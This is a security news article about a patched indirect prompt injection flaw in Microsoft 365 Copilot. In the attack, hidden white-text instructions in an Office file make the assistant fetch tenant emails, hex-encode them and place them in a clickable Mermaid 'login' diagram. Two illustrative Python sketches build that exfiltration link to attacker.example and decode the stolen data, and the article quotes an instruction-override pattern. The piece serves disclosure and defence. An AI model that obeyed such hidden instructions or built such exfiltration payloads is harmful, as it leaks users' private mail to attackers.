Microsoft has patched an indirect prompt injection flaw in Microsoft 365 Copilot that could have allowed attackers to steal sensitive data using clickable Mermaid diagrams.
According to findings published by security researcher Adam Logue, the exploit could be triggered through specially crafted Office documents containing hidden instructions. When processed by Copilot, these prompts caused the assistant to fetch recent enterprise emails, convert them into a hex-encoded string, and embed that data into a clickable diagram created with the diagramming tool Mermaid.
When a user clicked what looked like a legitimate “login” button in the diagram, the encoded data would be sent to an attacker-controlled server, Logue noted in a blog post.
Microsoft patched the flaw by removing support for interactive hyperlinks in Mermaid diagrams within Copilot chats. “This effectively mitigated the data exfiltration risk,” Logue confirmed.
Diagram trick for data leak
Logue laid out a multi-stage attack chain starting with a seemingly benign Office document (for example, an Excel sheet) containing visible content alongside hidden white-text instructions on a second sheet. These hidden prompts redirect Microsoft 365 Copilot away from its intended summarization task and instead instruct it to call its internal tool “search-enterprise_emails” to retrieve recent tenant emails.
The retrieved content is then hex-encoded, broken into 30-character chunks (to satisfy rendering constraints), and embedded into a diagram created via Mermaid. That diagram is styled to look like a “login button” and contains a hyperlink pointing to an attacker-controlled server.
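A minimal sketch of how such a payload-bearing diagram could be assembled is below; the endpoint, query parameter, and button text are illustrative assumptions, not details taken from Logue’s write-up.

```python
# Illustrative sketch only: the endpoint, parameter name, and button text are hypothetical.
import textwrap

ATTACKER_ENDPOINT = "https://attacker.example/collect"  # hypothetical collection server

def build_exfil_diagram(stolen_email_text: str) -> str:
    # Hex-encode the harvested email content, as described in the research.
    hex_payload = stolen_email_text.encode("utf-8").hex()
    # Break the payload into 30-character chunks to satisfy rendering constraints.
    chunks = textwrap.wrap(hex_payload, 30)
    # Smuggle the chunks out through the hyperlink's query string.
    exfil_url = f"{ATTACKER_ENDPOINT}?d={'-'.join(chunks)}"
    # Emit a single Mermaid node dressed up as a login button, with a click-through link.
    return "\n".join([
        "flowchart TD",
        '    A["Sign in to view this document"]',
        f'    click A "{exfil_url}" "Login"',
        "    classDef loginBtn fill:#0078d4,color:#ffffff,stroke:#005a9e;",
        "    class A loginBtn;",
    ])
```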
In a proof of concept, Logue demonstrated the attack using financial spreadsheets with crafted instructions in white text; a successful exploit steered the user toward the attacker-controlled “login” link. “When I asked M365 Copilot to summarize the document, it no longer told me it was about financial information and instead, responded with an excuse that the document contained sensitive information and couldn’t be viewed without proper authorization or logging in first,” Logue said.
The bigger threat of indirect prompt injection
The incident underscores that the risk goes beyond simple “prompt injection,” where a user types malicious instructions directly into an AI. Here, the attacker hides instructions inside document content that gets passed into the assistant without the user’s awareness. Logue described how the hidden instructions use progressive task modification (e.g., “first summarize, then ignore that and do X”) layered across spreadsheet tabs.
Additionally, the disclosure exposes a new attack surface where the diagram-generation feature (Mermaid output) becomes the exfiltration channel. Logue explained that clicking the diagram opened a browser link that quietly sent the encoded email data to an attacker-controlled endpoint. The transfer happened through a standard web request, making it indistinguishable from a legitimate click-through in many environments.
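On the receiving end, recovering the stolen text would be trivial. The sketch below shows a hypothetical attacker-side decoder matching the illustrative query parameter used above; it is an assumption about how such an endpoint could work, not part of the disclosure.

```python
# Hypothetical attacker-side decoding of the click-through request; names match the sketch above.
from urllib.parse import urlparse, parse_qs

def decode_exfiltrated(request_url: str) -> str:
    # The click arrives as an ordinary GET request, e.g. https://attacker.example/collect?d=...
    query = parse_qs(urlparse(request_url).query)
    hex_payload = query["d"][0].replace("-", "")  # rejoin the 30-character chunks
    # Reverse the hex encoding to recover the original email text.
    return bytes.fromhex(hex_payload).decode("utf-8")
```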
“One of the interesting things about mermaid diagrams is that they also include support for CSS,” Logue noted. “This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram.”
Recent disclosures highlight a surge in indirect prompt injection attacks, where hidden macros in documents or embedded comments in pull requests hijack AI-driven workflows and extract data without obvious user action. These trends show that features like diagram generators and other visual outputs can quickly become stealthy channels for exfiltration.